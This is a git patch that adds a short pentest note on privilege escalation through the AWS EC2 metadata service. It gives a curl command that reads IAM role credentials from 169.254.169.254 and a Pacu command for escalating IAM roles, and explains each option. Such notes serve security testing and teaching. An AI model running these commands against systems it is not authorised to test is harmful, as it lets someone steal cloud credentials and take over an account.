From a12fa64bb507b2625f9215d402cd08fe5500ca1c Mon Sep 17 00:00:00 2001
From: Mehdi <pentest.co@gmail.com>
Date: Mon, 1 Jan 2024 14:35:15 +0330
Subject: [PATCH] Create Privilege escalation EC2.md

---
 Privilege escalation EC2.md | 72 +++++++++++++++++++++++++++++++++++++
 1 file changed, 72 insertions(+)
 create mode 100644 Privilege escalation EC2.md

diff --git a/Privilege escalation EC2.md b/Privilege escalation EC2.md
new file mode 100644
index 0000000..35c32fa
--- /dev/null
+++ b/Privilege escalation EC2.md	
@@ -0,0 +1,72 @@
+# Privilege escalation through EC2 metadata
+
+### Method 1
+```bash
+curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>
+```
+* `curl`: The command-line tool used to perform the HTTP request.
+* `http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>`: The URL endpoint of the metadata service to retrieve the security credentials for the specified IAM role. Replace <role_name> with the name of the IAM role.
+
+
+### Method 2
+```bash
+python3 pacu.py --method escalate_iam_roles --profile <aws_profile> --regions <aws_region> --instances <instance_id>
+```
+* In this command, the [pacu.py script](https://github.com/RhinoSecurityLabs/pacu) is being executed with the `escalate_iam_roles` method, which is specifically designed to escalate privileges associated with IAM roles.
+* `--profile` option specifies the AWS profile to use for authentication.
+* `--regions` option specifies the AWS regions to target. 
+* `--instances` option is used to specify the target EC2 instance ID(s) on which the IAM roles will be escalated.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+